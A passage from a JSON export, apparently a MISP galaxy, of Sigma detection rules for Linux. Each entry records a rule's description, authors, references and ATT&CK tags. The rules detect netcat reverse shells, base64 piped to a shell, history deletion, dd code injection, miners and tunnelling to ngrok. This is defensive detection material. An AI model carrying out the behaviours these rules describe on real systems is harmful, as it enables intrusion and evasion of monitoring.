"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml" ], "tags": [ "attack.persistence", "attack.t1136" ] }, "related": [ { "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b28e4eb3-8bbc-4f0c-819f-edfe8e2f25db", "value": "ESXi Account Creation Via ESXCLI" }, { "description": "Detects usage of command line tools such as \"kill\", \"pkill\" or \"killall\" to terminate or signal a running process.", "meta": { "author": "Tuan Le (NCSGroup)", "creation_date": "2023-03-16", "falsepositive": [ "Likely" ], "filename": "proc_creation_lnx_kill_process.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.cyberciti.biz/faq/how-force-kill-process-linux/", "https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_kill_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "64c41342-6b27-523b-5d3f-c265f3efcdb3", "value": "Terminate Linux Process Via Kill" }, { "description": "Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-05", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_lnx_triple_cross_rootkit_install.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml" ], "tags": [ "attack.defense-evasion", "attack.t1014" ] }, "related": [ { "dest-uuid": "0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "22236d75-d5a0-4287-bf06-c93b1770860f", "value": "Triple Cross eBPF Rootkit Install Commands" }, { "description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "creation_date": "2021-10-15", "falsepositive": [ "Legitimate use of SCX RunAsProvider ExecuteScript." ], "filename": "proc_creation_lnx_omigod_scx_runasprovider_executescript.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/Azure/Azure-Sentinel/pull/3059", "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml" ], "tags": [ "attack.privilege-escalation", "attack.initial-access", "attack.execution", "attack.t1068", "attack.t1190", "attack.t1203" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", "value": "OMIGOD SCX RunAsProvider ExecuteScript" }, { "description": "Detects execution of the \"esxcli\" command with the \"storage\" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon", "creation_date": "2023-09-04", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_esxcli_storage_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html", "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_storage.html", "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1033", "attack.t1007" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f41dada5-3f56-4232-8503-3fb7f9cf2d60", "value": "ESXi Storage Information Discovery Via ESXCLI" }, { "description": "Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Github operations such as ghe-backup" ], "filename": "proc_creation_lnx_env_shell_invocation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/env/#shell", "https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_env_shell_invocation.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bed978f8-7f3a-432b-82c5-9286a9b3031a", "value": "Shell Invocation via Env Command - Linux" }, { "description": "Detects execution of netcat with the \"-e\" flag followed by common shells. This could be a sign of a potential reverse shell setup.", "meta": { "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-07", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_lnx_netcat_reverse_shell.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/", "https://man7.org/linux/man-pages/man1/ncat.1.html", "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://www.infosecademy.com/netcat-reverse-shells/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7f734ed0-4f47-46c0-837f-6ee62505abd9", "value": "Potential Netcat Reverse Shell Execution" }, { "description": "Detects setting proxy configuration", "meta": { "author": "Ömer Günal", "creation_date": "2020-06-17", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_proxy_connection.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://attack.mitre.org/techniques/T1090/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml" ], "tags": [ "attack.defense-evasion", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", "value": "Connection Proxy" }, { "description": "Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.\n", "meta": { "author": "Nextron Systems", "creation_date": "2022-06-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_python_pty_spawn.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c4042d54-110d-45dd-a0e1-05c47822c937", "value": "Python Spawning Pretty TTY Via PTY Module" }, { "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_susp_git_clone.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml" ], "tags": [ "attack.reconnaissance", "attack.t1593.003" ] }, "related": [ { "dest-uuid": "70910fbd-58dc-4c1c-8c48-814d11fcd022", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cfec9d29-64ec-4a0f-9ffe-0fdb856d5446", "value": "Suspicious Git Clone - Linux" }, { "description": "Detects suspicious process command line that uses base64 encoded input for execution with a shell", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2022-07-26", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_base64_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/arget13/DDexec", "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ba592c6d-6888-43c3-b8c6-689b8fe47337", "value": "Linux Base64 Encoded Pipe to Shell" }, { "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", "meta": { "author": "Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "creation_date": "2021-10-15", "falsepositive": [ "Legitimate usage of xclip tools." ], "filename": "proc_creation_lnx_clipboard_collection.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.packetlabs.net/posts/clipboard-data-security/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml" ], "tags": [ "attack.collection", "attack.t1115" ] }, "related": [ { "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ec127035-a636-4b9a-8555-0efd4e59f316", "value": "Clipboard Collection with Xclip Tool" }, { "description": "Detects potential overwriting and deletion of a file using DD.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "creation_date": "2021-10-15", "falsepositive": [ "Any user deleting files that way." ], "filename": "proc_creation_lnx_dd_file_overwrite.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml" ], "tags": [ "attack.impact", "attack.t1485" ] }, "related": [ { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2953194b-e33c-4859-b9e8-05948c167447", "value": "DD File Overwrite" }, { "description": "Detects executions of scripts located in potentially suspicious locations such as \"/tmp\" via a shell such as \"bash\", \"sh\", etc.", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml" ], "tags": [ "attack.execution" ] }, "uuid": "30bcce26-51c5-49f2-99c8-7b59e3af36c7", "value": "Execution Of Script Located In Potentially Suspicious Directory" }, { "description": "Detects java process spawning suspicious children", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_susp_java_children.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.tecmint.com/different-types-of-linux-shells/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d292e0af-9a18-420c-9525-ec0ac3936892", "value": "Suspicious Java Children Processes" }, { "description": "Detects common command used to enable bpf kprobes tracing", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_bpf_kprob_tracing_enabled.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", "https://bpftrace.org/", "https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml" ], "tags": [ "attack.execution", "attack.defense-evasion" ] }, "uuid": "7692f583-bd30-4008-8615-75dab3f08a99", "value": "Enable BPF Kprobes Tracing" }, { "description": "Detects usage of \"find\" binary in a suspicious manner to perform discovery", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_susp_find_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf", "value": "Potential Discovery Activity Using Find - Linux" }, { "description": "Detects the use of the \"apt\" and \"apt-get\" commands to execute a shell or proxy commands.\nSuch behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_apt_shell_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/apt-get/", "https://gtfobins.github.io/gtfobins/apt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_apt_shell_execution.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bb382fd5-b454-47ea-a264-1828e4c766d6", "value": "Shell Invocation via Apt - Linux" }, { "description": "Detects a potentially suspicious execution of a process located in the '/tmp/' folder", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_susp_execution_tmp_folder.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "312b42b1-bded-4441-8b58-163a3af58775", "value": "Potentially Suspicious Execution From Tmp Folder" }, { "description": "Detects execution of the \"mount\" command with \"hidepid\" parameter to make invisible processes to other users from the system", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-01-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_mount_hidepid.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/", "https://blogs.blackberry.com/", "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml" ], "tags": [ "attack.credential-access", "attack.t1564" ] }, "related": [ { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ec52985a-d024-41e3-8ff6-14169039a0b3", "value": "Mount Execution With Hidepid Parameter" }, { "description": "Detects the execution of a cat /etc/sudoers to list all users that have sudo rights", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_cat_sudoers.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/sleventyeleven/linuxprivchecker/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml" ], "tags": [ "attack.reconnaissance", "attack.t1592.004" ] }, "related": [ { "dest-uuid": "774ad5bb-2366-4c13-a8a9-65e50b292e7c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0f79c4d2-4e1f-4683-9c36-b5469a665e06", "value": "Cat Sudoers" }, { "description": "Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_susp_history_delete.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/sleventyeleven/linuxprivchecker/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml" ], "tags": [ "attack.impact", "attack.t1565.001" ] }, "related": [ { "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1182f3b3-e716-4efa-99ab-d2685d04360f", "value": "History File Deletion" }, { "description": "Detects linux package removal using builtin tools such as \"yum\", \"apt\", \"apt-get\" or \"dpkg\".", "meta": { "author": "Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-09", "falsepositive": [ "Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting)." ], "filename": "proc_creation_lnx_remove_package.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command", "https://linuxhint.com/uninstall-debian-packages/", "https://linuxhint.com/uninstall_yum_package/", "https://sysdig.com/blog/mitre-defense-evasion-falco", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remove_package.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "95d61234-7f56-465c-6f2d-b562c6fedbc4", "value": "Linux Package Uninstall" }, { "description": "Detects execution of the \"esxcli\" command with the \"system\" and \"permission\" flags in order to assign admin permissions to an account.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-04", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_esxcli_permission_change_admin.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml" ], "tags": [ "attack.execution" ] }, "uuid": "9691f58d-92c1-4416-8bf3-2edd753ec9cf", "value": "ESXi Admin Permission Assigned To Account Via ESXCLI" }, { "description": "Detects listing of the inodes of the \"/\" directory to determine if the we are running inside of a container.", "meta": { "author": "Seth Hanford", "creation_date": "2023-08-23", "falsepositive": [ "Legitimate system administrator usage of these commands", "Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered" ], "filename": "proc_creation_lnx_susp_inod_listing.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker", "https://blog.skyplabs.net/posts/container-detection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "43e26eb5-cd58-48d1-8ce9-a273f5d298d8", "value": "Potential Container Discovery Via Inodes Listing" }, { "description": "Detects command line parameters or strings often used by crypto miners", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-10-26", "falsepositive": [ "Legitimate use of crypto miners" ], "filename": "proc_creation_lnx_crypto_mining.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.poolwatch.io/coin/monero", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml" ], "tags": [ "attack.impact", "attack.t1496" ] }, "related": [ { "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9069ea3c-b213-4c52-be13-86506a227ab1", "value": "Linux Crypto Mining Indicators" }, { "description": "Detects chmod targeting files in abnormal directory paths.", "meta": { "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "creation_date": "2022-06-03", "falsepositive": [ "Admin changing file permissions." ], "filename": "proc_creation_lnx_susp_chmod_directories.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml" ], "tags": [ "attack.defense-evasion", "attack.t1222.002" ] }, "related": [ { "dest-uuid": "09b130a2-a77e-4af0-a361-f46f9aad1345", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6419afd1-3742-47a5-a7e6-b50386cd15f8", "value": "Chmod Suspicious Directory" }, { "description": "Detects the injection of code by overwriting the memory map of a Linux process using the \"dd\" Linux command.", "meta": { "author": "Joseph Kamau", "creation_date": "2023-12-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_dd_process_injection.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/", "https://github.com/AonCyberLabs/Cexigua/blob/34d338620afae4c6335ba8d8d499e1d7d3d5d7b5/overwrite.sh", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_dd_process_injection.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055.009" ] }, "related": [ { "dest-uuid": "d201d4cc-214d-4a74-a1ba-b3fa09fd4591", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4cad6c64-d6df-42d6-8dae-eb78defdc415", "value": "Potential Linux Process Code Injection Via DD Utility" }, { "description": "Detects events with patterns found in commands used for reconnaissance on linux systems", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_susp_recon_indicators.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml" ], "tags": [ "attack.reconnaissance", "attack.t1592.004", "attack.credential-access", "attack.t1552.001" ] }, "related": [ { "dest-uuid": "774ad5bb-2366-4c13-a8a9-65e50b292e7c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0cf7a157-8879-41a2-8f55-388dd23746b7", "value": "Linux Recon Indicators" }, { "description": "Detects an executable initiating a network connection to \"LocaltoNet\" tunneling sub-domains.\nLocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.\nAttackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.\n", "meta": { "author": "Andreas Braathen (mnemonic.io)", "creation_date": "2024-06-17", "falsepositive": [ "Legitimate use of the LocaltoNet service." ], "filename": "net_connection_lnx_domain_localtonet_tunnel.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "linux", "refs": [ "https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications", "https://localtonet.com/documents/supported-tunnels", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_domain_localtonet_tunnel.yml" ], "tags": [ "attack.command-and-control", "attack.t1572", "attack.t1090", "attack.t1102" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c4568f5d-131f-4e78-83d4-45b2da0ec4f1", "value": "Communication To LocaltoNet Tunneling Service Initiated - Linux" }, { "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-11-03", "falsepositive": [ "Legitimate use of ngrok" ], "filename": "net_connection_lnx_ngrok_tunnel.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "linux", "refs": [ "https://twitter.com/hakluke/status/1587733971814977537/photo/1", 